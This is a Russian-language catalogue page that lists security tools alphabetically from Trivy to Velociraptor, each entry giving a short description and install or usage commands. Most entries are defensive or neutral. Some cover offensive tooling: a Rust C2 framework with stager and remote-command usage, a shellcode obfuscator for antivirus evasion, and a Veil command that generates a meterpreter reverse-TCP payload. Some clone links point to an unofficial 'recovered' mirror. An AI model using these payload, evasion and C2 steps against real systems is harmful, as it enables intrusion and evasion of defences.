Каталог инструментов

325 инструментов

Trivy

v0.72.0
Cloud & Container Security

Универсальный сканер уязвимостей для контейнеров, файловых систем, Git-репозиториев и IaC (Terraform, K8s, Dockerfile) от Aqua Security. Находит CVE в OS-пакетах и библиотеках, секреты в коде, мисконфигурации инфраструктуры. Быстрый, …

curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh | sh trivy image nginx:latest trivy fs . trivy k8s cluster

Trojan-go

v0.10.6
Anonymizers

Прокси, маскирующий трафик под легитимный HTTPS. Сервер слушает на 443 порту и при попытке DPI или неверном пароле отдаёт реальный сайт-приманку, выглядя для инспектора как обычный веб-сервер. Поддерживает …

# Скачать бинарник wget https://github.com/p4gefau1t/trojan-go/releases/latest/download/trojan-go-linux-amd64.zip unzip trojan-go-linux-amd64.zip # Конфиг клиента (client.json) # {"run_type":"client","local_addr":"127.0.0.1","local_port":1080, # "remote_addr":"my.server","remote_port":443,"password":["pass"], # "ssl":{"sni":"my.server"}} ./trojan-go -config client.json

TruffleHog

v3.95.7
Reconnaissance ★ featured

Сканер для поиска утёкших секретов, токенов и учётных данных в git-репозиториях, S3-бакетах, файловых системах и других источниках. Использует верификацию через API, чтобы отличить активные токены от старых. Возможности: …

# Скачать бинарь (Linux): curl -sSfL https://raw.githubusercontent.com/trufflesecurity/trufflehog/main/scripts/install.sh | sh -s -- -b /usr/local/bin # go install: go install github.com/trufflesecurity/trufflehog/v3@latest # Docker: docker run --rm -it trufflesecurity/trufflehog:latest git https://github.com/target/repo # Примеры: # Сканировать публичный репозиторий: trufflehog git https://github.com/target/repo # Локальный репозиторий с верификацией: trufflehog git file://./myrepo --only-verified # Вся организация на GitHub: trufflehog github --org=myorg --token=$GITHUB_TOKEN # Только новые коммиты (для CI): trufflehog git file://. --since-commit HEAD~1 --only-verified

Tshark

v4.6.4
Network Analysis

Консольная версия Wireshark. Идеальна для автоматизации и работы на серверах.

sudo apt install tshark

Tsukuyomi

v0.4.2
Exploitation

C2-фреймворк на Rust для Linux x86_64 и Windows x86_64. Реализует staged-доставку: стейджер (Mikazuki) выходит на связь по HTTPS, замещает себя в памяти полным имплантом (Mangetsu), который берёт на …

# Требования: Rust 1.70+, Linux x86_64 git clone https://codeberg.org/lorsupra/Tsukuyomi.git cd Tsukuyomi cargo build --release # Запуск (однобинарный лаунчер: поднимает сервер + консоль) ./target/release/tsukuyomi # В консольном REPL: # build stager -- компилирует стейджер (Linux + Windows), запрашивает URL C2 # build implant -- компилирует имплант (Linux + Windows) # build all -- стейджер + имплант # sessions -- список активных сессий # interact 1 -- подключиться к сессии #1 # shell id=1 whoami -- выполнить команду на цели # Схема: стейджер → HTTPS → сервер → замена в памяти → имплант # Имплант остаётся только в RAM; TLS-пиннинг бакается при сборке

TwiTi

Defensive & Threat Intelligence

Инструмент для извлечения индикаторов компрометации (IOC) из твитов, включая ссылки, упомянутые в них. Классифицирует твиты на содержащие/не содержащие IOC. Разработан Samsung Research, представлен на конференции TheWebConf 2021 в …

git clone https://git.toolsofthetrade.qzz.io/recovered/twiti.git cd twiti pip install -r requirements.txt # Требуется доступ к Twitter API для сбора твитов

UDSim

Hardware & Industrial

Симулятор ECU для тестирования UDS (Unified Diagnostic Services) — стандартного протокола диагностики автомобилей (ISO 14229). Эмулирует ответы ECU на UDS-запросы: ReadDataByIdentifier, SecurityAccess, RoutineControl. Используется для разработки automotive security …

git clone https://github.com/zombieCraig/UDSim cd UDSim && pip install -r requirements.txt ./udsim.py vcan0

UniByAv

Exploitation

Простой обфускатор shellcode: генерирует исполняемый файл, дружественный к антивирусам, из сырого shellcode. Процедура обфускации написана на ассемблере — генерируется 32-битный XOR-ключ, который брутфорсится и расшифровывается прямо во время …

git clone https://git.toolsofthetrade.qzz.io/recovered/unibyav.git cd unibyav # Требуется cygwin/MinGW toolchain на Windows для компиляции итогового .exe python UniByAv4.2.py shellcode.bin output.exe /path/to/MinGW/bin/

Universal Radio Hacker

v2.10.0
Wireless & RF ★ featured

Полный инструментарий для исследования беспроводных протоколов через SDR: запись сигналов, автоматическое определение модуляции (ASK/FSK/PSK/OFDM), декодирование битов, фаззинг протоколов. Графический интерфейс. Поддерживает RTL-SDR, HackRF, USRP и другие.

pip install urh # или: git clone https://github.com/jopohl/urh cd urh && python setup.py install # Запуск GUI: urh

V2Ray / Xray

v5.49.0
Anonymizers

Мощный фреймворк для построения собственных прокси-сетей. Поддерживает множество протоколов (VMess, VLESS, Trojan) и может маскировать трафик под обычный HTTPS. Xray — это форк V2Ray с улучшениями производительности. Крайне …

Veil

v3.1.14
Exploitation

Фреймворк для генерации payload-ов, обходящих антивирусную защиту. Veil-Evasion создаёт исполняемые файлы для Windows с шифрованием shellcode на различных языках: Python, PowerShell, C, C#. Интегрируется с Metasploit.

# Kali Linux: sudo apt install veil sudo /usr/share/veil/config/setup.sh --force --silent veil # Из исходников: git clone https://github.com/Veil-Framework/Veil cd Veil sudo ./config/setup.sh --force --silent sudo python3 Veil.py # Генерация payload: sudo python3 Veil.py -t Evasion -p python/meterpreter/rev_tcp.py \ --ip 192.168.1.100 --port 4444 -o payload_name

Velociraptor

v0.77.1
Malware Analysis & Forensics

Продвинутая платформа для DFIR (цифровая криминалистика и реагирование на инциденты) — позволяет одновременно "охотиться" на угрозы на тысячах эндпоинтов через собственный язык запросов VQL: собирать артефакты, файлы, память, …

# Один кроссплатформенный бинарник, без зависимостей: wget https://github.com/Velocidex/velociraptor/releases/latest/download/velociraptor-linux-amd64 chmod +x velociraptor-linux-amd64 ./velociraptor-linux-amd64 config generate > server.config.yaml ./velociraptor-linux-amd64 --config server.config.yaml frontend